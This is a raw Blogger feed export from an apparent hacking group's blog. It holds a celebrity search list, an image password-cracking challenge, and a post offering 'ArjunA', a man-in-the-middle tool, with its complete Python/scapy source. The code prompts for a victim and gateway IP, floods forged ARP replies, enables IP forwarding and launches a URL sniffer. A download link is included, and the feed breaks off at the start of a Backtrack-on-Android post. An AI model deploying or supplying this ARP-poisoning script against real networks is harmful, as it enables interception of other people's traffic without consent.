<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUh_5p7a68z8E5_Rn0QC3bwsmTbI26ALnQFp4Q1BGB5lQ6pGVV5uAKOc1z2N8lrLYjmGFyFGgZ7VNWQSMKw8UZtHGi77qabQnwK7QcYNU-R0dhLbyTPRbLZHoDfky3SWg4zkV2cu0AwvE/s1600/logo+sized.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUh_5p7a68z8E5_Rn0QC3bwsmTbI26ALnQFp4Q1BGB5lQ6pGVV5uAKOc1z2N8lrLYjmGFyFGgZ7VNWQSMKw8UZtHGi77qabQnwK7QcYNU-R0dhLbyTPRbLZHoDfky3SWg4zkV2cu0AwvE/s200/logo+sized.png" /></a></div>
<b>Top 10 Searched Peoples In Google Search 2013</b><br />
<br />
1.Nelson Mandela<br />
2.Paul Walker<br />
3.Malala Yousafzai<br />
4.James Gandolfini<br />
5.Miley Cyrus<br />
6.Oscar Pistorius<br />
7.Jennifer Lawrence<br />
8.Aaron Hernandez<br />
9.Charlie Hunnam<br />
10.Adrian Peterson<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-50730831967188777542013-08-19T16:50:00.000-04:002013-08-19T16:50:34.210-04:00CHALLENGE - CRACK THE IMAGE<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #e06666; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: #e06666; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">CRACK PASS FROM THE IMAGE</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"> <span style="color: #f3f3f3;">Hello friends it took long time to crack previous challenge for members. And so far only one member cracked it correctly. So we planned to make this challenge a bit easier compared to the previous one.<br /></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #bf9000;">Note:</span><span style="color: #f3f3f3;"> </span><span style="color: #f6b26b;">Also comment to your FB or mail id along with answer . And try to upload your image and give us the link so that we can publish, Which helps others to identify u.</span></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBxZMMGJfb7tGtN-sEaJxq5cP6xWoETaum0_2jOtYZ1e36tFSfjB_aSqYaj2PUqLHULlZseVD01RUuZooFclVlmejY1e-7hEUaKeWN4-ZNJQ8Qsv2gpMSChoYolcTu37HgV1W5IUMg3AA/s1600/360AEEB96408D1D11DC77A1244AD29E3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBxZMMGJfb7tGtN-sEaJxq5cP6xWoETaum0_2jOtYZ1e36tFSfjB_aSqYaj2PUqLHULlZseVD01RUuZooFclVlmejY1e-7hEUaKeWN4-ZNJQ8Qsv2gpMSChoYolcTu37HgV1W5IUMg3AA/s400/360AEEB96408D1D11DC77A1244AD29E3.jpg" width="400" /></a></div>
<br /></div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com2tag:blogger.com,1999:blog-5858162330672279498.post-67380521409833158782013-08-18T15:22:00.002-04:002013-08-18T15:22:54.283-04:00ARJUNA - MAN IN THE MIDDLE ATTACK TOOL<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #76a5af; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">ARJUNA - ARP POISONING TOOL</span> </div>
<div style="text-align: center;">
<span style="color: #d5a6bd; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Power Of BOW and ----> </span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_CnulXgF0qDFrtHaebz04epbCIlcaBrejduniziPRM0wdzFhPDbA6h8b-nExPvBnZcqAn6lHcOtqvKM6HCFFWI-uupyPHjn6RtQG5ukcWzhxPX7dUto5P4KRPL6IUPRdiersRtCIJT4/s1600/smriti3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_CnulXgF0qDFrtHaebz04epbCIlcaBrejduniziPRM0wdzFhPDbA6h8b-nExPvBnZcqAn6lHcOtqvKM6HCFFWI-uupyPHjn6RtQG5ukcWzhxPX7dUto5P4KRPL6IUPRdiersRtCIJT4/s1600/smriti3.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"> <span style="color: #f3f3f3;">This tool s completely developed by "Chennai Hackers Connect" Team. It is a lightweight and flexible tool with an interactive mode which is written in python.The next tool of CHC them will have inbuilt DNS spoofing and SSL Strip. </span></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><br /></span></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;">FEATURES:</span></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;">1. ARP SPOOFING</span></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;">2. AUTOMATIC IP FORWARDING </span></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;">3. HALF AND FULL ROUTING</span></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #f6b26b; font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="color: #bf9000;">ArjunA Source Code :</span><br /></span></div>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">#!/usr/bin/python</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import subprocess</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">ban=""" </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t =TARGET= </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t .`. </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t .`.::`. </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ```.,.``` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `,:::'',:::;';:'+;:::.` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `:. `,: :,` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ., `.: `., </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `,.` ,,. `.,` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ` .++ ,.; . </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `` `'.,':,: `` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `` ;+',++:. `` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t .` :+;.''+;` `` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ;'+,:;#;` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `` `;::, </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ArjunA `:. `..::` Power Of BOW and ----> </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ,.. ..;: ` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ,,;,.;..`. </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t .,,.,. :`, </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `,.,:``.,: </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t For Hackers ..;.```;, ==>Chennai Hackers Connect<== </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t By Hackers ,.,::,;;: </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `., ``.,:. </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ..,,, `., ` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `.,,,,; `,. . `.::;;+++', </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ` ``...,:;` `.,, `;+######+;` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t ````...,,,:, `...;.` ,####+;.` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `.,;'````.`.'#``...;':`` `'##+, </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t `,;,`,;+';::,,::;::;';:,``,+#+` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t .::,.` .,:'+++''''';;;;;:;;:,` </span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">\t http://chennaihackers.blogspot.com</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">"""</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">subprocess.call('clear', shell=True)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">print(ban)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import sys</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import os</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import time</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import logging</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">from time import sleep</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">logging.getLogger("scapy.runtime").setLevel(logging.ERROR)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">from scapy.all import *</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">def ddr_protocol():</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if len(ban)!=1758:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("DDR protocol Enabled .You altered the program, So it wont work\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sys.exit()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">def usage():</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\n"+"-"*76)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("./ArjunA.py -interface UserName (or) ./ArjunA.py -interfcae (or) ./ArjunA.py")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("-"*76)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> </span></span><br />
<br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">help = ["-h" , "--help"]</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">if (len(sys.argv)) >= 2 :</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmdhelp=sys.argv[1]</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if cmdhelp in help :</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>usage()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sys.exit(1)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">if (len(sys.argv)) >= 3:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>user = sys.argv[2]</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("Hi " +user+ "....")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">else: user="User"</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">ddr_protocol()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">def urlsniff():</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sniff=os.system("gnome-terminal -e 'bash -c \"urlsnarf; exec bash\"'")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">def ipfor_en():</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>forward=os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\n"+'\033[94m'+"IP forwarding Enabled"+'\033[0m'+"\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">def ipfor_dis():</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>forward=os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\n"+'\033[94m'+"IP forwarding Disabled"+'\033[0m'+"\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">victim = raw_input("Enter victims IP : ")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">target = raw_input("Enter Gateway IP : ")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">#url = str(input("Do you need url sniffer : "))</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">url = raw_input("Do you need url sniffer : ")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">if (len(sys.argv)) >= 2:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>face=sys.argv[1]</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>interface=face.lstrip("-")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">else:interface=raw_input("Enter the interface : ")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">urlyes = ["yes", "y", "YES", "Y"]</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">urlno = [ "no", "NO", "n", "N"]</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">if url in urlyes :</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>urlsniff()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\n"+"\x1b[01;36m"+"Sniffer Activated"+'\033[0m'+"\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">if url in urlno :</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\n"+'\033[91m'+"Sniffer Not Activated" + '\033[0m' +"\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">for i in range(26):</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sys.stdout.write('\r')</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> # the exact output you're looking for:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sys.stdout.write("[%-26s]%d%%" % ('='*i+'>', 4*i))</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sys.stdout.flush()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sleep(0.18)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">sys.stdout.write("\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">ip = IP(dst=victim)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">icmp = ICMP()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">send(ip/icmp, verbose=0, iface=interface)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">a = ARP(op=2, psrc=target, pdst=victim)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">b = ARP(op=2, psrc=victim, pdst=target)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">#a.show()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">#b.show()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">print("\nAttack in progress press 'ctrl+c' to stop and exit\n")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">ipfor_en()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">count=0</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">while 1:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>count += 1<span class="Apple-tab-span" style="white-space: pre;"> </span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>try:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>at = send(a, verbose=0, iface=interface)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if count == 1 :</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\x1b[01;32m"+"Half Routing sucessfull !"+ '\033[0m')</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span> bt = send(b, verbose=0, iface=interface)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if count == 1 :</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\x1b[01;32m"+"Full Routing sucessfull !!"+ '\033[0m')</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>time.sleep(60)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>except KeyboardInterrupt:</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print("\r\n=====> Attack Stopped by " +user+" <=====")</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ipfor_dis()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span> sys.stdin.close()</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span class="Apple-tab-span" style="white-space: pre;"> </span> sys.exit()</span><br />
<br />
<br />
<br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">You can also download tool in python extension.</span><br />
<br />
<br />
<div style="text-align: center;">
<a href="http://www.4shared.com/file/MJ_WsY8R/ArjunA.html?" target="_blank"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYM6LNfckIakiHv4jGxdzNBpN0tcpvaJ2nRVDB2jGoKhAs4IgyoR6W1XapZgNxwgmoU75vucpATiaOu-y5QpklIZQBsJHvfHeY32Ua7XteK_PsnDFeNrTe5_XwyfT2b7fBCbH316UIMDVL/s1600/MayanWeapons_Bow-icon.png" /></a></div>
<div style="text-align: center;">
<span style="color: #b45f06;">Download here</span></div>
<div style="text-align: left;">
<br /></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-56979886633662983822013-08-09T14:42:00.001-04:002013-08-09T14:42:12.801-04:00Installing Backtrack In An Android Device<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<a href="http://www.linkwithin.com/"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><img alt="Related Posts Plugin for WordPress, Blogger..." src="http://www.linkwithin.com/pixel.png" style="border: 0;" /></span></a></div>
<div style="text-align: left;">
</div>
<div style="text-align: center;">
<span style="color: #0000ee; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Install Backtrack In Tablets</span></div>
<div style="text-align: left;">
<span style="color: #0000ee; font-family: Verdana, sans-serif;"><u><br /></u></span></div>
<br />
<div style="text-align: center;">
